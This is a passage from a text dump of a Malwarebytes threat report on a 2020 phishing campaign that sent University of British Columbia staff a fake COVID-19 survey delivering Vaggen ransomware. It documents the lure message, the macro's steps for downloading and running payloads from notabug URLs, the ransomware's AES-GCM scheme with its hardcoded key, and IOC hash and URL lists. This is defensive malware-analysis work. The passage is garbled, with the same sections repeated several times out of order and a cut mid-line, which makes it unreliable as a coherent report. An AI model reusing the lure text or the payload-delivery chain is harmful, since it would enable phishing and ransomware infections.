address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 325 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 326 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 327 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 328 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 329 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 330 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 331 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 332 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 333 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 334 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 335 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 336 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 337 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 338 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 339 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 340 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 341 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 342 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 343 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 344 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 345 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 346 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 347 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 348 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 349 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 350 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 351 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 352 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 353 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 354 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1